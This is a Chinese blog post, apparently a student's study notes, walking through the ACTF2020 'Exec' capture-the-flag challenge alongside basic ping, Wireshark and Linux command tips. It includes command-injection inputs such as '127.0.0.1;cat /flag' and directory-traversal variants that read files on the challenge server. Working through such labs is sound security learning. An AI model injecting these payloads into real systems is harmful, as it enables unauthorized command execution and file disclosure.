当前位置:网站首页>[ACTF2020 新生赛]Exec 1
[ACTF2020 新生赛]Exec 1
2022-07-29 20:17:00 【借zj文章[de]BvxiE】
ping命令
如何在cmd里面ping命令
指令:racert 网址
ping一个网站和ping -t 一个网址出来的区别,前者只显示4组数据。
ipconfig /all显示自己的电脑配置
Wireshark中的一点点使用,查找时(过滤)
ping时:ip.addr ==网址 and icmp
直接网页中:
http and ip.addr == 网址
ip.addr ==网址 and tcp
27个常用的 Linux 命令!ls会列举出当前工作目录的内容(文件或文件夹)
[ACTF2020 新生赛]Exec 1
养成习惯!没事就抓个包!这个题先不借助工具,整原理!
127.0.0.1;ls
127.0.0.1;ls /,列出根目录下的文件
127.0.0.1;cat /flag,cat进行读取
或由下可得127.0.0.1;cat ../../../flag
是看wp的,将知识点进行梳理
1.127.0.0.1;cat index.php,查找一下里面的信息
isset ()函数是用于确定变量是否已设置且不为空;换句话说,仅当变量不为null时才返回true。
2.目录遍历
简单了解一下目录遍历!127.0.0.1;ls ../
127.0.0.1;ls ../../
127.0.0.1;ls ../../../和127.0.0.1;ls ../../../../效果一样,所以一般只要设的足够多就可以!
命令注入
这次仅仅了解一下命令注入符号!
节选于上个链接!
可参考文章:https://blog.csdn.net/m0_47745762/article/details/118932465?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165848802716782248535320%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=165848802716782248535320&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-1-118932465-null-null.142v33experiment_2_v1,185v2control&utm_term=actf2020%20%E6%96%B0%E7%94%9F%E8%B5%9B%5Dexec%2019&spm=1018.2226.3001.4187
及文章:https://blog.csdn.net/wangyuxiang946/article/details/120995294?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165848802716782248535320%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=165848802716782248535320&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-2-120995294-null-null.142v33experiment_2_v1,185v2control&utm_term=actf2020%20%E6%96%B0%E7%94%9F%E8%B5%9B%5Dexec%2019&spm=1018.2226.3001.4187
边栏推荐
- Where is Naive Bayes "naive"?
- Sasser virus source code (ransomware source code)
- LOG4J 学习
- offsetwidth111[通俗易懂]
- 如何优雅的自定义 ThreadPoolExecutor 线程池
- 点击返回顶部
- PEG-siRNA-PCL|siRNA-PEG-LHRH|MPEG-siRNA 甲氧基聚乙二醇修饰核酸
- 模拟量、数字量与开关量的区别
- SwiftUI * @State 相关问题
- The second growth curve | The driving guide for corporate innovation to break through the stagnation dilemma
猜你喜欢
240. 搜索二维矩阵 II
使用IDEA连接mysql
![[mathematical foundation] higher mathematics concept learning](/img/59/3e1608de63c60201b3e7aaaf032d42.png)
[mathematical foundation] higher mathematics concept learning
促进二十一世纪创客教育的新发展
EasyExce template filling generation of Excel of actual operation, many processing sheet page
Baidu internship students late night fun: originally giant is this kind of life
【无标题】
使用MD5加密后的字符串存密码安全吗?你不得不了解的Hash算法
JMeter使用教程(一)
安全浏览器将拥有这些隐藏功能,让你玩转浏览器
随机推荐
GalNAc-siRNA甘露糖/半乳糖修饰脱氧核糖核酸|siRNA-S-S-DSPE(RNA修饰技术介绍)
What are the software development modes (software engineering development mode)
JMeter tutorial (a)
ES6用法,面试大全
磁性层状双金属氢氧化物和酶-DNA复合物|聚乙烯亚胺-DNA复合物(PEI/DNA)|作用机理
The second growth curve | The driving guide for corporate innovation to break through the stagnation dilemma
单核浏览器和双核浏览器有什么区别,哪个好用?
[GXYCTF2019] ban dolls
这半年我做交易链路自动化回归的那些事儿...
震荡波病毒原代码(勒索病毒源代码)
About the choice of x86, x64, x86_64, ARM 64, ARM 32 when installing software
offsetwidth111[easy to understand]
朴素贝叶斯“朴素”在哪里?
Kubernetes: (4) Common commands
Sasser virus source code (ransomware source code)
8.2实训任务 Sqoop的安装与配置
进程间六种通信方式
用对象字面量或Map替代Switch/if语句
offsetwidth111[通俗易懂]
华为笔记本键盘锁住了(笔记本电脑键盘怎么亮起来)